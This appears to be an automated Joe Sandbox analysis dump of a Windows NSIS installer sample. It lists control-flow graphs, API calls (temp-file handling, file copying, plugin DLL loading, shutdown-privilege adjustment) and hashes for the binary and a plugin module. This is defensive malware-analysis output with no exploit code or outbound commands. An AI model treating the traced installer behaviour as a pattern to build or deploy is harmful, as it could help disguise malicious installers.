GlobalAlloc 5122->5191 5123->5101 5124->5118 5125 73c62253 5125->5118 5126->5101 5128->5113 5129 73c6206d 5129->5057 5132 73c623ac 5130->5132 5131 73c6122c GlobalAlloc lstrcpynW 5131->5132 5132->5131 5134 73c624d5 GlobalFree 5132->5134 5135 73c62454 GlobalAlloc WideCharToMultiByte 5132->5135 5136 73c6247f GlobalAlloc CLSIDFromString 5132->5136 5139 73c6249e 5132->5139 5200 73c612ba 5132->5200 5134->5132 5137 73c617cf 5134->5137 5135->5134 5136->5134 5137->5067 5137->5068 5137->5082 5139->5134 5204 73c626b8 5139->5204 5142 73c62abe 5140->5142 5141 73c62b63 CreateFileA 5143 73c62b81 5141->5143 5142->5141 5207 73c62a56 5143->5207 5145 73c62c4d 5145->5082 5147 73c62367 5146->5147 5148 73c62372 GlobalAlloc 5147->5148 5149 73c617c8 5147->5149 5148->5147 5149->5060 5154 73c62754 5150->5154 5151 73c62802 5153 73c62808 GlobalSize 5151->5153 5155 73c62812 5151->5155 5152 73c627ef GlobalAlloc 5152->5155 5153->5155 5154->5151 5154->5152 5155->5085 5157 73c62d42 5156->5157 5158 73c62d82 GlobalFree 5157->5158 5211 73c6121b GlobalAlloc 5159->5211 5161 73c6260e StringFromGUID2 5168 73c62573 5161->5168 5162 73c6261f lstrcpynW 5162->5168 5163 73c625ec MultiByteToWideChar 5163->5168 5164 73c62632 wsprintfW 5164->5168 5165 73c62656 GlobalFree 5165->5168 5166 73c6268b GlobalFree 5166->5075 5167 73c61272 2 API calls 5167->5168 5168->5161 5168->5162 5168->5163 5168->5164 5168->5165 5168->5166 5168->5167 5212 73c612e1 5168->5212 5216 73c6121b GlobalAlloc 5170->5216 5172 73c615b9 LdrInitializeThunk 5172->5084 5174 73c612b5 GlobalFree 5173->5174 5175 73c6127b GlobalAlloc lstrcpynW 5173->5175 5174->5083 5175->5174 5177 73c615d2 wsprintfW 5176->5177 5178 73c615ff lstrcpyW 5176->5178 5181 73c61618 5177->5181 5178->5181 5181->5086 5183 73c6253a 5182->5183 5184 73c61891 5182->5184 5183->5184 5185 73c62556 GlobalFree 5183->5185 5184->5093 5184->5094 5185->5183 5187 73c61272 2 API calls 5186->5187 5188 73c6155e 5187->5188 5188->5087 5189->5098 5190->5101 5192 73c615ad 5191->5192 5192->5122 5199 73c6121b GlobalAlloc 5193->5199 5195 73c6123b lstrcpynW 5195->5118 5196->5129 5197->5119 5198->5125 5199->5195 5201 73c612c1 5200->5201 5202 73c6122c 2 API calls 5201->5202 5203 73c612df 5202->5203 5203->5132 5205 73c626c6 VirtualAlloc 5204->5205 5206 73c6271c 5204->5206 5205->5206 5206->5139 5208 73c62a61 5207->5208 5209 73c62a66 GetLastError 5208->5209 5210 73c62a71 5208->5210 5209->5210 5210->5145 5211->5168 5213 73c6130c 5212->5213 5214 73c612ea 5212->5214 5213->5168 5214->5213 5215 73c612f0 lstrcpyW 5214->5215 5215->5213 5216->5172 5221 401735 5222 402c41 17 API calls 5221->5222 5223 40173c SearchPathW 5222->5223 5224 4029e6 5223->5224 5225 401757 5223->5225 5225->5224 5227 4063e8 lstrcpynW 5225->5227 5227->5224 5966 402a35 5967 402c1f 17 API calls 5966->5967 5968 402a3b 5967->5968 5969 402a72 5968->5969 5970 40288b 5968->5970 5972 402a4d 5968->5972 5969->5970 5971 40640a 17 API calls 5969->5971 5971->5970 5972->5970 5974 40632f wsprintfW 5972->5974 5974->5970 5975 4014b8 5976 4014be 5975->5976 5977 401389 2 API calls 5976->5977 5978 4014c6 5977->5978 5979 401db9 GetDC 5980 402c1f 17 API calls 5979->5980 5981 401dcb GetDeviceCaps MulDiv ReleaseDC 5980->5981 5982 402c1f 17 API calls 5981->5982 5983 401dfc 5982->5983 5984 40640a 17 API calls 5983->5984 5985 401e39 CreateFontIndirectW 5984->5985 5986 402592 5985->5986 5987 40283b 5988 402843 5987->5988 5989 402847 FindNextFileW 5988->5989 5990 402859 5988->5990 5989->5990 5991 4029e6 5990->5991 5993 4063e8 lstrcpynW 5990->5993 5993->5991 5994 73c6103d 5997 73c6101b 5994->5997 5998 73c61516 GlobalFree 5997->5998 5999 73c61020 5998->5999 6000 73c61027 GlobalAlloc 5999->6000 6001 73c61024 5999->6001 6000->6001 6002 73c6153d 3 API calls 6001->6002 6003 73c6103b 6002->6003

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 8 4034ee 1->8 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 8->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 34 4035e0-4035e4 30->34 35 4035db-4035df 30->35 31->30 31->31 38 4036a3-4036b0 call 405cea 34->38 39 4035ea-4035f0 34->39 35->34 36->37 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->53 57 403814-403824 call 4039e6 OleUninitialize 37->57 58 403769-40376f 37->58 55 4036b2-4036b3 38->55 56 4036b4-4036ba 38->56 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->38 54 40369d-4036a1 50->54 51->50 52 40364d-403655 51->52 60 403657-40365a 52->60 61 40365c 52->61 53->37 53->57 54->38 63 4036c2-4036d0 call 4063e8 54->63 55->56 56->28 64 4036c0 56->64 73 40394a-403950 57->73 74 40382a-40383a call 405a4e ExitProcess 57->74 65 403804-40380b call 403ad8 58->65 66 403775-403780 call 405cea 58->66 60->50 60->61 61->50 69 4036d5 63->69 64->69 76 403810 65->76 80 403782-4037b7 66->80 81 4037ce-4037d8 66->81 69->29 78 403952-403968 GetCurrentProcess OpenProcessToken 73->78 79 4039ce-4039d6 73->79 76->57 87 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 78->87 88 40399e-4039ac call 4067c2 78->88 82 4039d8 79->82 83 4039dc-4039e0 ExitProcess 79->83 89 4037b9-4037bd 80->89 85 403840-403854 call 4059b9 lstrcatW 81->85 86 4037da-4037e8 call 405dc5 81->86 82->83 100 403861-40387b lstrcatW lstrcmpiW 85->100 101 403856-40385c lstrcatW 85->101 86->57 99 4037ea-403800 call 4063e8 * 2 86->99 87->88 102 4039ba-4039c5 ExitWindowsEx 88->102 103 4039ae-4039b8 88->103 90 4037c6-4037ca 89->90 91 4037bf-4037c4 89->91 90->89 95 4037cc 90->95 91->90 91->95 95->81 99->65 100->57 106 40387d-403880 100->106 101->100 102->79 104 4039c7-4039c9 call 40140b 102->104 103->102 103->104 104->79 109 403882-403887 call 40591f 106->109 110 403889 call 40599c 106->110 115 40388e-40389c SetCurrentDirectoryW 109->115 110->115 118 4038a9-4038d2 call 4063e8 115->118 119 40389e-4038a4 call 4063e8 115->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->57 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                              • GetVersion.KERNEL32 ref: 004034CE
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                              • #17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,?,00000000), ref: 00403561
                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\KO0q4biYfC.exe",?,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,?,00000006,?,0000000A), ref: 004035AE
                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                              • GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004036E8
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004036F9
                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403705
                                              • GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403719
                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403721
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403732
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040373A
                                              • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 0040374E
                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                              • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
                                              • ExitProcess.KERNEL32 ref: 0040383A
                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403867
                                              • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403873
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040388F
                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\KO0q4biYfC.exe,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
                                              • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                              • ExitProcess.KERNEL32 ref: 004039E0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$C:\Users\user\AppData\Roaming\brugser\brugo$C:\Users\user\Desktop$C:\Users\user\Desktop\KO0q4biYfC.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 3441113951-2521317436
                                              • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                              • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 139 40558f-4055aa 140 4055b0-405677 GetDlgItem * 3 call 404394 call 404ced GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405739-405740 139->141 163 405695-405698 140->163 164 405679-405693 SendMessageW * 2 140->164 143 405742-405764 GetDlgItem CreateThread CloseHandle 141->143 144 40576a-405777 141->144 143->144 146 405795-40579f 144->146 147 405779-40577f 144->147 151 4057a1-4057a7 146->151 152 4057f5-4057f9 146->152 149 405781-405790 ShowWindow * 2 call 404394 147->149 150 4057ba-4057c3 call 4043c6 147->150 149->146 160 4057c8-4057cc 150->160 153 4057a9-4057b5 call 404338 151->153 154 4057cf-4057df ShowWindow 151->154 152->150 157 4057fb-405801 152->157 153->150 161 4057e1-4057ea call 405450 154->161 162 4057ef-4057f0 call 404338 154->162 157->150 165 405803-405816 SendMessageW 157->165 161->162 162->152 168 4056a8-4056bf call 40435f 163->168 169 40569a-4056a6 SendMessageW 163->169 164->163 170 405918-40591a 165->170 171 40581c-405847 CreatePopupMenu call 40640a AppendMenuW 165->171 178 4056c1-4056d5 ShowWindow 168->178 179 4056f5-405716 GetDlgItem SendMessageW 168->179 169->168 170->160 176 405849-405859 GetWindowRect 171->176 177 40585c-405871 TrackPopupMenu 171->177 176->177 177->170 180 405877-40588e 177->180 181 4056e4 178->181 182 4056d7-4056e2 ShowWindow 178->182 179->170 183 40571c-405734 SendMessageW * 2 179->183 184 405893-4058ae SendMessageW 180->184 185 4056ea-4056f0 call 404394 181->185 182->185 183->170 184->184 186 4058b0-4058d3 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058d5-4058fc SendMessageW 186->188 188->188 189 4058fe-405912 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                              • GetClientRect.USER32(?,?), ref: 00405639
                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                              • ShowWindow.USER32(?,?), ref: 004056DC
                                              • GetDlgItem.USER32(?,?), ref: 004056FD
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                              • GetDlgItem.USER32(?,?), ref: 0040560B
                                                • Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                              • GetDlgItem.USER32(?,?), ref: 0040574F
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                              • CloseHandle.KERNELBASE(00000000), ref: 00405764
                                              • ShowWindow.USER32(00000000), ref: 00405788
                                              • ShowWindow.USER32(?,?), ref: 0040578D
                                              • ShowWindow.USER32(?), ref: 004057D7
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                              • CreatePopupMenu.USER32 ref: 0040581C
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                              • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                              • EmptyClipboard.USER32 ref: 004058B7
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                              • CloseClipboard.USER32 ref: 00405912
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: (7B${
                                              • API String ID: 590372296-525222780
                                              • Opcode ID: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                              • Opcode Fuzzy Hash: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                              APIs
                                                • Part of subcall function 73C6121B: GlobalAlloc.KERNELBASE(?,?,73C6123B,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C61225
                                              • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 73C61C6B
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 73C61CB3
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 73C61CBD
                                              • GlobalFree.KERNEL32(00000000), ref: 73C61CD0
                                              • GlobalFree.KERNEL32(?), ref: 73C61DB2
                                              • GlobalFree.KERNEL32(?), ref: 73C61DB7
                                              • GlobalFree.KERNEL32(?), ref: 73C61DBC
                                              • GlobalFree.KERNEL32(00000000), ref: 73C61FA6
                                              • lstrcpyW.KERNEL32(?,?), ref: 73C62140
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 73C621B5
                                              • LoadLibraryW.KERNEL32(00000008), ref: 73C621C6
                                              • GetProcAddress.KERNEL32(?,?), ref: 73C62220
                                              • lstrlenW.KERNEL32(00000808), ref: 73C6223A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              • API String ID: 245916457-0
                                              • Opcode ID: 8433eb3182cbf622b5fbb1d38c95f9ca14bcc59d435ad4720d1f29feba47fa84
                                              • Instruction ID: 97912e9e4c71f98df01c4c47d835157692e1f176a04b3de1a35e7120d1eaf606
                                              • Opcode Fuzzy Hash: 8433eb3182cbf622b5fbb1d38c95f9ca14bcc59d435ad4720d1f29feba47fa84
                                              • Instruction Fuzzy Hash: 2522B771D0464ADFDB12CFA6C9C47EEB7F9FB04316F11852AD1A7EA280D7709A808B51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 716 405afa-405b20 call 405dc5 719 405b22-405b34 DeleteFileW 716->719 720 405b39-405b40 716->720 721 405cb6-405cba 719->721 722 405b42-405b44 720->722 723 405b53-405b63 call 4063e8 720->723 724 405c64-405c69 722->724 725 405b4a-405b4d 722->725 731 405b72-405b73 call 405d09 723->731 732 405b65-405b70 lstrcatW 723->732 724->721 727 405c6b-405c6e 724->727 725->723 725->724 729 405c70-405c76 727->729 730 405c78-405c80 call 40672b 727->730 729->721 730->721 740 405c82-405c96 call 405cbd call 405ab2 730->740 735 405b78-405b7c 731->735 732->735 736 405b88-405b8e lstrcatW 735->736 737 405b7e-405b86 735->737 739 405b93-405baf lstrlenW FindFirstFileW 736->739 737->736 737->739 741 405bb5-405bbd 739->741 742 405c59-405c5d 739->742 756 405c98-405c9b 740->756 757 405cae-405cb1 call 405450 740->757 744 405bdd-405bf1 call 4063e8 741->744 745 405bbf-405bc7 741->745 742->724 747 405c5f 742->747 758 405bf3-405bfb 744->758 759 405c08-405c13 call 405ab2 744->759 748 405bc9-405bd1 745->748 749 405c3c-405c4c FindNextFileW 745->749 747->724 748->744 752 405bd3-405bdb 748->752 749->741 755 405c52-405c53 FindClose 749->755 752->744 752->749 755->742 756->729 762 405c9d-405cac call 405450 call 4061ae 756->762 757->721 758->749 763 405bfd-405c06 call 405afa 758->763 767 405c34-405c37 call 405450 759->767 768 405c15-405c18 759->768 762->721 763->749 767->749 771 405c1a-405c2a call 405450 call 4061ae 768->771 772 405c2c-405c32 768->772 771->749 772->749
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B23
                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B6B
                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B8E
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B94
                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405BA4
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$0WB$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                              • API String ID: 2035342205-178022407
                                              • Opcode ID: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                              • Opcode Fuzzy Hash: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                              APIs
